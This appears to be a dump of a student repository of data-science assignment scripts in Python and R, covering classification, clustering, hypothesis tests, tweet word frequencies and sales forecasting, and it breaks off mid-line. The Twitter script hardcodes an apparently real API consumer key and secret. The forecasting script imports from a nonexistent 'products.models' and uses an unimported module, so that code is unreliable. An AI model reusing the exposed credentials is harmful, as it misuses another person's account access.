data_sampled.iloc[:,-1]\r\n\r\n#separating train and test data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X,Y,test_size = 0.20,random_state = 42)\r\n\r\n# building decision tree classification model\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nmodel = DecisionTreeClassifier(criterion = 'entropy',random_state = 0)\r\nmodel.fit(x_train,y_train)\r\n\r\n#predicting on test data\r\ny_pred = model.predict(x_test)\r\n#getting accuracy score\r\n\r\n#getting accuracy score\r\nfrom sklearn import metrics\r\nmetrics.accuracy_score(y_test,y_pred) #89.69%\r\n\r\n\r\npd.crosstab(y_test,y_pred)\r\nmodel.score(x_train,y_train)\r\n\r\n#accuracy score of test data\r\nmodel.score(x_test,y_test) #0.896\r\n\r\n#storing predictions to the data\r\ndata['y_pred'] = model.predict(data.iloc[:,0:10]) \r\npd.crosstab(data.sales,data.y_pred).plot(kind = 'bar')\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = print(confusion_matrix(data.sales, data.y_pred))\r\nnp.mean(data.y_pred == data.sales) #0.945\r\n\r\n#overall accuracy\r\nmodel.score(X,Y) #0.979\r\nmodel.predict([[135,80,12,302,100,1,50,20,1,0]])\r\n\r\nfrom sklearn import tree\r\ntree.plot_tree(model.fit(x_train,y_train))\r\n\r\n\r\n" }, { "alpha_fraction": 0.5127776265144348, "alphanum_fraction": 0.555290162563324, "avg_line_length": 31.214284896850586, "blob_id": "6f18f323e1ed26a33e18c918a7ed8c5a67d117e5", "content_id": "97d4b0ca04aac306823b2840d3d898acc53a3cc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4197, "license_type": "no_license", "max_line_length": 133, "num_lines": 126, "path": "/Text mining 1/twitter.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 4 11:12:35 2020\r\n\r\n@author: Vinayak Dhotre\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport warnings\r\nimport tweepy\r\nfrom wordcloud import WordCloud\r\n#conda install -c conda-forge wordcloud\r\n#credentials\r\nconsumer_key = \"e5er9Ba7ACWjxmkCSCEpdMTv2\"\r\nconsumer_secret = \"Qv1BfqtglOWoh3F7olX1G0Tsa2JbDuus7KEdSmJkGL1JMKpQwT\"\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\napi = tweepy.API(auth)\r\n\r\n#getting first 200 tweets\r\nuserID= 'dhruv_rathee'\r\ntweets = api.user_timeline(screen_name=userID, \r\n # 200 is the maximum allowed count\r\n count=200,\r\n include_rts = False,\r\n # Necessary to keep full_text \r\n # otherwise only the first 140 words are extracted\r\n tweet_mode = 'extended'\r\n )\r\n\r\noldest = tweets[-1].id - 1\r\n\r\n \r\n#info on fist 3tweets\r\nfor info in tweets[:3]:\r\n print(\"ID: {}\".format(info.id))\r\n print(info.created_at)\r\n print(\"\\n\")\r\n\r\n# =============================================================================\r\n# =============================================================================\r\n# ID: 1323694224957734914\r\n# 2020-11-03 18:31:10\r\n# Eagerly waiting to say bye bye to Doland Trump Chacha tomorrow 🤞\r\n# \r\n# \r\n# ID: 1323226147572908040\r\n# 2020-11-02 11:31:12\r\n# Oh acha, aisa hai kya?\r\n# \r\n# Are you talking about this video? Guys, can you please watch and share this video to know if she’s talking about this video or not?\r\n# \r\n# 👉https://t.co/sDaPWuP8rP\r\n# \r\n# Because I didn’t receive any payment https://t.co/Reu72RUQ3V\r\n# \r\n# \r\n# ID: 1322927160340975617\r\n# 2020-11-01 15:43:08\r\n# New Video on France Attacks \r\n# \r\n# Watch: https://t.co/RKw8i3PAmI https://t.co/sF73vJtxVR\r\n# =============================================================================\r\n# =============================================================================\r\n\r\n#extracting all tweets\r\nall_tweets = []\r\nall_tweets.extend(tweets)\r\noldest_id = tweets[-1].id\r\nwhile True:\r\n tweets = api.user_timeline(screen_name=userID, \r\n # 200 is the maximum allowed count\r\n count=200,\r\n include_rts = False,\r\n max_id = oldest_id - 1,\r\n # Necessary to keep full_text \r\n # otherwise only the first 140 words are extracted\r\n tweet_mode = 'extended'\r\n )\r\n if len(tweets) == 0:\r\n break\r\n oldest_id = tweets[-1].id\r\n all_tweets.extend(tweets)\r\n print('N of tweets downloaded till now {}'.format(len(all_tweets))) \r\n \r\n\r\n\r\n#data cleaning\r\nfrom pandas import DataFrame\r\nouttweets = [[tweet.id_str, \r\n tweet.created_at, \r\n tweet.favorite_count, \r\n tweet.retweet_count,\r\n tweet.full_text.encode(\"utf-8\").decode(\"utf-8\")]\r\n for idx,tweet in enumerate(all_tweets)]\r\ndf = DataFrame(outtweets,columns=[\"id\",\"created_at\",\"favorite_count\",\"retweet_count\", \"text\"])\r\n\r\n#getting frequency of words using count vectorizer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\n\r\ncv = CountVectorizer(stop_words = 'english')\r\nwords = cv.fit_transform(df.text)\r\nsum_words = words.sum(axis=0)\r\n\r\nwords_freq = [(word, sum_words[0, i]) for word, i in cv.vocabulary_.items()]\r\nwords_freq = sorted(words_freq, key = lambda x: x[1], reverse = True)\r\nfrequency = pd.DataFrame(words_freq, columns=['word', 'freq'])\r\n\r\n#frequency plot\r\nfrequency.head(30).plot(x='word', y='freq', kind='bar', figsize=(15, 7), color = 'blue')\r\nplt.title(\"Most Frequently Occuring Words - Top 30\")\r\n#https, bjp, india, people ,modi\r\n\r\n#plotting wordcloud\r\nall_words = ' '.join([text for text in df['text']])\r\nfrom wordcloud import WordCloud\r\nwordcloud = WordCloud(width=800, height=500, random_state=21, max_font_size=110).generate(all_words)\r\nplt.title('Dhruv Rathee Tweet Analysis')\r\nplt.figure(figsize=(10, 7))\r\nplt.imshow(wordcloud, interpolation=\"bilinear\")\r\nplt.axis('off')\r\nplt.show()\r\n\r\n" }, { "alpha_fraction": 0.6650132536888123, "alphanum_fraction": 0.6875, "avg_line_length": 31.932584762573242, "blob_id": "960e101d6891c2f9b20bd6f5c226c9b8175c627b", "content_id": "3b4aedfe91089232029fb2e6edc4bafa25652204", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3024, "license_type": "no_license", "max_line_length": 91, "num_lines": 89, "path": "/Decision Tree/Fraud_check.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 29 17:04:15 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Decision Tree\\\\Fraud_check.csv')\r\ndata\r\ndata.info() #no-null values\r\ndata.columns\r\ndf = data['Taxable.Income']\r\ndata['status'] = np.where(df<=30000,'Risky','Good`')\r\ndata_cat = ['Undergrad', 'Marital.Status','Urban','status']\r\n\r\n#encoding categorical data\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber = LabelEncoder()\r\nfor i in data_cat:\r\n data[i] = number.fit_transform(data[i])\r\n\r\n#EDA\r\nimport seaborn as sns\r\nsns.countplot(x='Undergrad',data=data).plot(kind = 'bar')\r\nsns.countplot(x='Marital.Status',data=data).plot(kind = 'bar')\r\nsns.countplot(x='Urban',data=data).plot(kind = 'bar')\r\nsns.countplot(x='status',data=data).plot(kind = 'bar') #largely imbalanced\r\n\r\nsns.boxplot(x= 'Marital.Status',y= 'City.Population',data = data)\r\nsns.boxplot(x= 'status',y= 'City.Population',data = data)\r\nsns.boxplot(x= 'status',y= 'Work.Experience',data = data)\r\n\r\npd.crosstab(data['Marital.Status'],data.status).plot(kind = 'bar')\r\n#dropping the Taxable.Income Column as we've converted it into the categorical variable\r\ndata = data.drop('Taxable.Income',axis = 1)\r\n\r\n##Oversampling to avoid any information loss and to deal with the bias\r\ndata.status.value_counts() # 0=476,1=124\r\nmajority_class = data[data.status == 0]\r\nminority_class = data[data.status == 1]\r\n\r\nfrom sklearn.utils import resample\r\nminority_class_unsampled = resample(minority_class,\r\n replace = True, #sample with replacement\r\n n_samples = 476, #to match majority class\r\n random_state = 123) #reproducible results\r\n\r\ndf_unsampled = pd.concat([majority_class,minority_class_unsampled])\r\ndf_unsampled.status.value_counts() # 0=476,1 =476\r\npd.crosstab(df_unsampled['Marital.Status'],df_unsampled.status).plot(kind = 'bar') #no bias\r\n\r\n#separating x and y variables\r\nX= df_unsampled.iloc[:,0:5]\r\nY= df_unsampled.iloc[:,-1]\r\n\r\n#splitting into test and train data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X,Y, test_size = 0.3,random_state = 42)\r\n \r\n#building classification model\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nmodel = DecisionTreeClassifier(criterion = 'entropy',min_samples_split = 2)\r\nmodel.fit(x_train,y_train)\r\nmodel.predict(x_test)\r\n\r\n#accuracy on test data\r\nmodel.score(x_test,y_test) #0.8461\r\n\r\n#storing the predictions\r\ndata['y_pred'] = model.predict(data.iloc[:,0:5]) \r\npd.crosstab(data.status,data.y_pred)\r\n\r\n#getting accuracy scores\r\nmodel.score(data.iloc[:,0:5],data.iloc[:,-1]) #1.0\r\nmodel.score(X,Y) #0.9538\r\n\r\n#confusion matrix\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = confusion_matrix(data.status,data.y_pred)\r\ncm\r\n\r\n#Visualizing the tree\r\nfrom sklearn import tree\r\ntree.plot_tree(model.fit(x_train,y_train))\r\n\r\n\r\n" }, { "alpha_fraction": 0.7044887542724609, "alphanum_fraction": 0.7244389057159424, "avg_line_length": 24.766666412353516, "blob_id": "0201094ff40149faad327987f4aa94741d3aea96", "content_id": "58fb806af3975e571bd40c3a6c3ec466fabc878a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 802, "license_type": "no_license", "max_line_length": 108, "num_lines": 30, "path": "/Hypothesis/LABTAT code.R", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "library(readxl)\r\nLAB<-read_excel(\"E:/Tej/Assignments/Asgnmnt/Hypothesis/LabTAT.xls\") # ContractRenewal_Data(unstacked).xlsx\r\nView(LAB)\r\nStacked_Data <- stack(LAB)\r\nView(Stacked_Data)\r\nattach(Stacked_Data)\r\n\r\n\r\nshapiro.test(LAB$`Laboratory 1`)\r\nshapiro.test(LAB$`Laboratory 2`)\r\nshapiro.test(LAB$`Laboratory 3`)\r\nshapiro.test(LAB$`Laboratory 4`)\r\n\r\nsummary(LAB)\r\nhist(LAB$`Laboratory 1`)\r\nhist(LAB$`Laboratory 2`)\r\nhist(LAB$`Laboratory 3`)\r\nhist(LAB$`Laboratory 4`)\r\nqqnorm(LAB$`Laboratory 1`)\r\n\r\n# Data is normally distributed\r\nlibrary(car)\r\n# Test for vaiance\r\nleveneTest(values ~ ind, data = Stacked_Data)\r\n?leveneTest\r\nAnova_results <- aov(values~ind,data = Stacked_Data)\r\nsummary(Anova_results)\r\nprint(Anova_results)\r\n# p-value = 0.104 > 0.05 accept null hypothesis \r\n# All Proportions all equal " }, { "alpha_fraction": 0.6890214681625366, "alphanum_fraction": 0.7088305354118347, "avg_line_length": 32.344261169433594, "blob_id": "aafdbf40d8d22e78369182f2eb81383f26c659e2", "content_id": "864e6bef4e725d0d50f1c01c5821ea0b28548978", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4190, "license_type": "no_license", "max_line_length": 99, "num_lines": 122, "path": "/Logistic regression/bank data-1.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*--\r\n\"\"\"\r\nCreated on Wed Aug 19 23:01:37 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ndata= pd.read_csv(\"E:\\\\Tej\\Assignments\\\\Asgnmnt\\\\Logistic regression\\\\bank-full.csv\",delimiter=';')\r\ndata.head()\r\n\r\n#changing unknown values with mode of the data(imputation)\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber= LabelEncoder()\r\ndata.job=number.fit_transform(data.job)\r\ndata.marital=number.fit_transform(data.marital)\r\ndata.education=number.fit_transform(data.education)\r\ndata.default=number.fit_transform(data.default)\r\ndata.housing=number.fit_transform(data.housing)\r\ndata.loan=number.fit_transform(data.loan)\r\ndata.month=number.fit_transform(data.month)\r\ndata.poutcome=number.fit_transform(data.poutcome) \r\ndata.y=number.fit_transform(data.y) \r\n\r\n\r\n#dropping irrelevant variables\r\nsns.countplot(x='marital',hue='y',data=data)\r\nsns.countplot(x='education',hue='y',data=data)\r\nsns.countplot(x='default',hue='y',data=data) # drop- skewed towards zero\r\nsns.countplot(x='housing',hue='y',data=data) \r\nsns.countplot(x='loan',hue='y',data=data) #drop=skewed towards zero\r\nsns.countplot(x='contact',hue='y',data=data) #insignificant for the prediction model\r\n\r\ndata.y.value_counts() #0-39922,1-5289\r\n#variables for building the model\r\ncat_var= data[['age', 'job', 'marital', 'education', 'default', 'balance', 'housing',\r\n 'loan', 'day', 'month', 'duration', 'campaign', 'pdays',\r\n 'previous', 'poutcome']]\r\ndata.columns\r\ndata.isnull().sum()\r\ncat_var.mode()\r\ncat_var.skew()\r\ncat_var.kurt()\r\ncat_var.shape\r\ncat_var.nunique()\r\ncat_var.dropna().shape\r\ncat_var['education'].value_counts()\r\ncat_var['poutcome'].value_counts() #0-39922,1-5289 this imbalance in data will lead to bias.\r\n\r\n\r\nfor col in cat_var:\r\n plt.figure(figsize=(10,4))\r\n sns.barplot(cat_var[col].value_counts(),cat_var[col].value_counts().index)\r\n plt.title(col)\r\n plt.tight_layout()\r\n\r\n\r\n#to remove the entire row containing na values #data= data[data.job!='unknown']\r\n\r\npd.crosstab(data.job,data.marital).plot(kind='bar')\r\npd.crosstab(data.job,data.default).plot(kind='bar')\r\npd.crosstab(data.housing,data.loan).plot(kind='bar')\r\npd.crosstab(data.education,data.default).plot(kind='bar')\r\npd.crosstab(data.housing,data.marital).plot(kind='bar')\r\n#data are imbalanced, so we will resample the data to get the balanced data for classification\r\n\r\n##oversampling\r\nmajority_class = cat_var[cat_var.poutcome == 0]\r\nminority_class = cat_var[cat_var.poutcome == 1]\r\n\r\nfrom sklearn.utils import resample\r\nminority_class_unsampled = resample(minority_class,\r\n replace = True, #sample with replacement\r\n n_samples = 39922, #to match majority class\r\n random_state = 123) #reproduce results\r\n\r\ndata_resampled = pd.concat([majority_class,minority_class_unsampled])\r\n\r\n#separating dependent andindependent variables\r\nX= data_resampled.iloc[:,0:14]\r\nY= data_resampled.iloc[:,-1]\r\n\r\n#splitting into train and test data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test=train_test_split(X,Y,test_size=0.25,random_state=0)\r\ny_train.value_counts().nunique()\r\ny_test.value_counts()\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\nclassifier=LogisticRegression()\r\nclassifier.fit(x_train,y_train)\r\nclassifier.score(x_test,y_test)\r\nclassifier.score(x_train,y_train) #0.762\r\nclassifier.score(cat_var.iloc[:,0:14],cat_var.iloc[:,-1]) #0.789\r\n\r\n#getting coefficients and intercepts\r\nclassifier.coef_\r\nclassifier.intercept_\r\n\r\n#getting results on test data\r\npredictions=classifier.predict(x_test)\r\n\r\n#gerring predictions on original data\r\ny_prob=pd.DataFrame(classifier.predict(cat_var.iloc[:,0:14]))\r\nnew_df= pd.concat([cat_var,y_prob],axis=1)\r\n\r\n#accurcy on original data\r\nnp.mean(cat_var.poutcome == new_df[0]) #0.789\r\n\r\npd.crosstab(new_df.poutcome,new_df[0]).plot(kind = 'bar')\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\nconfusion_matrix=confusion_matrix(y_test,predictions)\r\nconfusion_matrix\r\n\r\n#accuracy on test data\r\nnp.mean(y_test == predictions) #0.7600\r\n" }, { "alpha_fraction": 0.6712638139724731, "alphanum_fraction": 0.6883149743080139, "avg_line_length": 35.980953216552734, "blob_id": "f93450bddbd5767eb8e01437de67281c8de49403", "content_id": "76febd4db5253ab2b841990e04b5c83a9e390d14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3988, "license_type": "no_license", "max_line_length": 174, "num_lines": 105, "path": "/Random forest/company_data_RF.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 30 16:38:22 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndata = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Random forest\\\\Company_Data.csv')\r\ndata.info()\r\ndata.describe()\r\ndata.info() #no null values\r\ndata.columns\r\n\r\ndata_cat = ['ShelveLoc','Urban', 'US']\r\n\r\n#Encoding categorical data\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber = LabelEncoder()\r\nfor i in data_cat:\r\n data[i] = number.fit_transform(data[i])\r\n \r\nlabel_enc = LabelEncoder()\r\ndata['sales'] = label_enc.fit_transform(pd.cut(data['Sales'],bins = 2, retbins = True )[0]) #converting data into two bins\r\ndata = data.drop('Sales',axis = 1) #dropping the existing Sales column\r\n\r\n#EDA\r\nimport seaborn as sns\r\nsns.countplot(x= 'ShelveLoc',data =data)\r\nsns.countplot(x= 'Urban',data =data)\r\nsns.countplot(x= 'US',data =data)\r\n\r\nsns.barplot(data.sales,data.Price)\r\nsns.barplot(data.sales,data.Income)\r\nsns.barplot(data.Urban,data.Income)\r\n\r\nsns.boxplot(x='CompPrice',data = data)\r\nsns.boxplot(x ='Population',data = data) #no outlier\r\nsns.boxplot(x='Price',data = data) \r\nsns.boxplot(x='Age',data =data) #no outlier\r\nsns.boxplot(x= 'Education',data = data) #no outlier\r\nsns.boxplot(x= 'Income',data = data) #no outlier\r\nhelp(sns.boxplot) \r\n\r\nsns.boxplot(x = 'sales', y = 'CompPrice', data = data)\r\nsns.boxplot(x = 'sales', y = 'Population', data = data)\r\nsns.boxplot(x = 'sales', y = 'Price', data = data)\r\nsns.boxplot(x = 'sales', y = 'Income', data = data)\r\n\r\ndata.sales.value_counts() #0=241,1=159\r\n#imbalance in the sales variable will cause bias in the model. so, now we will go for resampling\r\n\r\nmajority_class = data[data.sales == 0] \r\nminority_class = data[data.sales == 1]\r\n\r\nfrom sklearn.utils import resample\r\nminority_class_unsampled = resample(minority_class,\r\n replace = True, #sample with replacement\r\n n_samples = 241, #samples matching majority class\r\n random_state = 123) #reproducing results\r\n\r\ndata_sampled = pd.concat([majority_class,minority_class_unsampled])\r\n#determining x and y data\r\nX= data_sampled.iloc[:,0:10]\r\nY= data_sampled.iloc[:,-1]\r\n\r\n#separating train and test data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X,Y,test_size = 0.20,random_state = 42)\r\n\r\n\r\n#Building Random forest classifier\r\n#After each tree is built, all of the data are run down the tree, and proximities are computed for\r\n# each pair of cases. If two cases occupy the same terminal node, their proximity is increased by one.\r\n# At the end of the run, the proximities are normalized by dividing by the number of trees. Proximities\r\n# are used in replacing missing data, locating outliers, and producing illuminating low-dimensional views\r\n# of the data.\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nmodel = RandomForestClassifier(n_jobs = 8, n_estimators = 1000,oob_score = True ,criterion = 'entropy')\r\n# oob- out of box sampling-no need for cross-validation or a separate test set to get an unbiased estimate of the test set error. It is estimated internally, during the run,\r\nmodel.fit(x_train, y_train)\r\n\r\nmodel.estimators_\r\nmodel.classes_ # levels in class variable\r\nmodel.n_classes_ #number of levels in class variable\r\nmodel.n_features_ #number of features\r\n\r\n#feature importance\r\nfea_imp = pd.DataFrame(model.feature_importances_,\r\n index = X.columns,\r\n columns = ['importance']).sort_values('importance',ascending =False)\r\n#US and Urban variables hold very little importance\r\n\r\nmodel.score(x_train,y_train)\r\nmodel.score(x_test,y_test) #0.9278\r\nmodel.score(data.iloc[:,0:10],data.iloc[:,-1]) #0.9475\r\ndata['y_pred'] = model.predict(data.iloc[:,0:10])\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = print(confusion_matrix(data.sales,data.y_pred))\r\n\r\nnp.mean(data.y_pred == data.sales) #0.9475\r\n" }, { "alpha_fraction": 0.6725468635559082, "alphanum_fraction": 0.6981807947158813, "avg_line_length": 35, "blob_id": "e7f152100566ea6168be7ca16f41f88fbc0913cc", "content_id": "72090a513c8f111c061fcbfcaef07b081ac334d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3628, "license_type": "no_license", "max_line_length": 121, "num_lines": 98, "path": "/Clustering/crimedata.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 23 08:56:57 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ncd=pd.read_csv('E:\\Tej\\Assignments\\Asgnmnt\\Clustering\\crime_data.csv')\r\ncd\r\n\r\ncd.info()\r\ncd.describe()\r\ncd.columns\r\n\r\n\r\ndef norm_func(i):\r\n x= (i- i.min())/(i.max() - i.min())\r\n return(x)\r\n\r\nX=norm_func(cd.iloc[:,1:])\r\n\r\n####KMeans Clustering####\r\n\r\nfrom sklearn.cluster import KMeans\r\nwcss = [] #store wcss values for each cluster in list\r\nfor i in range(1,11): #no. of clusters\r\n kmeans= KMeans(n_clusters= i, init='k-means++',random_state=42) #init to avoid random initialization trap\r\n kmeans.fit(X) #trained and run kmeans algorithm\r\n wcss.append(kmeans.inertia_)\r\nplt.plot(range(1,11),wcss,'ro-');plt.title('ELbow Method');plt.xlabel('Number of Clusters');plt.ylabel('wcss');plt.show()\r\n# we must choose 4 as the optimal number of clusters as the curve starts flattening from 4\r\n\r\nkmeans_f=KMeans(n_clusters=4,init='k-means++',random_state=42)\r\ny_kmeans=kmeans_f.fit_predict(X) #predicting the cluster for each row\r\ny_kmeans\r\nkmeans_f.labels_\r\n\r\ncd['clusters']= kmeans_f.labels_ #storing in the dataset\r\ncd.iloc[:,:].groupby(cd.clusters).mean()\r\n\r\ncluster1=X.loc[y_kmeans == 0]\r\ncluster2=X.loc[y_kmeans == 1]\r\ncluster3=X.loc[y_kmeans == 2]\r\ncluster4=X.loc[y_kmeans == 3]\r\n\r\nplt.scatter(cluster1['Murder'],cluster1['Assault'], c='red',label='Cluster 1')\r\nplt.scatter(cluster2['Murder'],cluster2['Assault'], c='blue',label='Cluster 2')\r\nplt.scatter(cluster3['Murder'],cluster3['Assault'], c='cyan',label='Cluster 3')\r\nplt.scatter(cluster4['Murder'],cluster4['Assault'], c='black',label='Cluster 4')\r\nplt.scatter(kmeans_f.cluster_centers_[:,0],kmeans_f.cluster_centers_[:,1],c='magenta',label='Centroids')\r\nplt.title('Clusters of crime')\r\nplt.xlabel('Murder')\r\nplt.ylabel('Assault')\r\nplt.show()\r\n\r\nsns.pairplot(cd,hue='clusters')\r\n\r\nsns.barplot(x='clusters',y='Murder',data=cd) #order=2,0,1,3\r\nsns.barplot(x='clusters',y='Assault',data=cd) #order=2,0,1,3\r\nsns.barplot(x='clusters',y='UrbanPop',data=cd) #order=2,3,0,1\r\nsns.barplot(x='clusters',y='Rape',data=cd) #order=2,0,3,1\r\n\r\n#cluster 2 is least vulnerable to the crimes and has lowest rates of crime and also has least urban population\r\n#Even if cluster 0 is having 2nd highest urban population, it has least rate of crimes after cluster2\r\n#cluster 1 having highest urban population, has highest rate of rapes and is second in terms of murder and assaults\r\n#cluster 3 is having lower Urban population, but it is having highest number of Murder and Assault crimes.\r\n\r\n\r\n####Hierarchicl clustering ####\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nhclust= AgglomerativeClustering(n_clusters=4,affinity='euclidean',linkage='ward').fit(X)\r\ny_hc= hclust.fit_predict(X)\r\ncd['clusters']=hclust.labels_\r\n\r\ncd.iloc[:,1:].groupby('clusters').mean()\r\n\r\nimport scipy.cluster.hierarchy as sch\r\nz= sch.linkage(X,method='ward',metric='euclidean')\r\nsch.dendrogram(z);plt.xlabel('state index');plt.ylabel('Euclidean distance');plt.title('Dendrogram')\r\n\r\ncluster1=X.loc[y_hc == 0]\r\ncluster2=X.loc[y_hc == 1]\r\ncluster3=X.loc[y_hc == 2]\r\ncluster4=X.loc[y_hc == 3]\r\n\r\nplt.scatter(cluster1['Murder'],cluster1['Assault'], c='red',label='Cluster 1')\r\nplt.scatter(cluster2['Murder'],cluster2['Assault'], c='magenta',label='Cluster 2')\r\nplt.scatter(cluster3['Murder'],cluster3['Assault'], c='cyan',label='Cluster 3')\r\nplt.scatter(cluster4['Murder'],cluster4['Assault'], c='blue',label='Cluster 4')\r\nplt.title('Clusters of crime')\r\nplt.xlabel('Murder')\r\nplt.ylabel('Assault')\r\nplt.show()\r\n\r\n" }, { "alpha_fraction": 0.5733137726783752, "alphanum_fraction": 0.6950146555900574, "avg_line_length": 34, "blob_id": "f1b8979d156bb49eb058327502832d2ca9a93301", "content_id": "69cfecf71b5b766b833a4e854e8336b389c7b5d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 682, "license_type": "no_license", "max_line_length": 131, "num_lines": 19, "path": "/Assignment 2/assignment 2.R", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "####SET+2####\r\n#Q1-\r\npnorm(50,45,8)\r\n\r\n#Q2 a) probability of employees older than 44\r\n1-pnorm(44,38,6) #=0.1586\r\n#probability of employee =s between age 38-44\r\npnorm(44,38,6)-pnorm(38,38,6) #=0.3413\r\n# Thus A.\tMore employees at the processing center are older than 44 than between 38 and 44= False\r\n\r\n#Q2 b) probability of employees younger than 30\r\npnorm(30,38,6)\r\n #Thus,no of emlployees = 0.091*400 =36.4\r\n # Thus,B.\tA training program for employees under the age of 30 at the center would be expected to attract about 36 employees= TRUE\r\n\r\n####SET4####\r\n#Q3_probability that in any given week, there will be an investigation is\r\na <- pnorm(55,50,40)-pnorm(45,50,40)\r\nbb <- 1-a" }, { "alpha_fraction": 0.5526389479637146, "alphanum_fraction": 0.5730242729187012, "avg_line_length": 28.042016983032227, "blob_id": "8376f13efa4943097435ac3057cf883057cfb8e4", "content_id": "f2f7d02fe1a9e74e7a54e7ba0872b5e50ca01d8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3581, "license_type": "no_license", "max_line_length": 100, "num_lines": 119, "path": "/Forecasting/cola2.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 1 16:25:42 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\ndf = pd.read_excel('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Forecasting\\\\CocaCola_Sales_Rawdata.xlsx')\r\ndf.head()\r\ndf.tail()\r\n\r\nimport seaborn as sns\r\nsns.boxplot(df['Sales'])\r\n\r\ndf.set_index(['Quarter'], inplace = True)\r\ndf.dtypes\r\ndf.head()\r\ndf.describe()\r\n\r\n# Lets us use auto_arima from p\r\nfrom pmdarima import auto_arima\r\nauto_arima_model = auto_arima(df['Sales'],start_p=0,\r\n start_q=0,max_p=5,max_q=5,\r\n m=12,start_P=0,seasonal=True,\r\n d=1,D=1,trace=True,error_action=\"ignore\",\r\n suppress_warnings= True,\r\n stepwise=False)\r\n#ARIMA(4,1,0)(1,1,0)[12] : AIC=400.949\r\nauto_arima_model.summary()\r\n\r\n# Using Sarimax from statsmodels \r\n# As we do not have automatic function in indetifying the \r\n# best p,d,q combination \r\n# iterate over multiple combinations and return the best the combination\r\n# For sarimax we require p,d,q and P,D,Q \r\nfrom products.models import Product\r\n\r\ncombinations_l = list(product(range(1,7),range(2),range(1,7)))\r\ncombinations_u = list(product(range(1,7),range(2),range(1,7)))\r\nm =12 \r\n\r\nresults_sarima = []\r\nbest_aic = float(\"inf\")\r\n\r\nfor i in combinations_l:\r\n for j in combinations_u:\r\n try:\r\n model_sarima = sm.tsa.statespace.SARIMAX(df[\"Sales\"],\r\n order = i,seasonal_order = j+(m,)).fit(disp=-1)\r\n except:\r\n continue\r\n aic = model_sarima.aic\r\n if aic < best_aic:\r\n best_model = model_sarima\r\n best_aic = aic\r\n best_l = i\r\n best_u = j\r\n results_sarima.append([i,j,model_sarima.aic])\r\n\r\ndf.plot();plt.xlabel('Quarter');plt.ylabel('sales')\r\n#upward trend with addiive seasonality and non-stationary\r\n\r\n#rolling statistics\r\nrol_mean = df.rolling(window = 4).mean()\r\nrol_sd = df.rolling(window = 4).std()\r\n\r\n#plotting the data\r\nplt.plot(df,color = 'blue', label = 'original data')\r\nplt.plot(rol_mean, color='red', label= 'rolling mean')\r\nplt.plot(rol_sd, color = 'black',label = 'rolling std')\r\nplt.legend(loc = 'best')\r\nplt.show()\r\n\r\ndf_shifted = pd.concat([df, 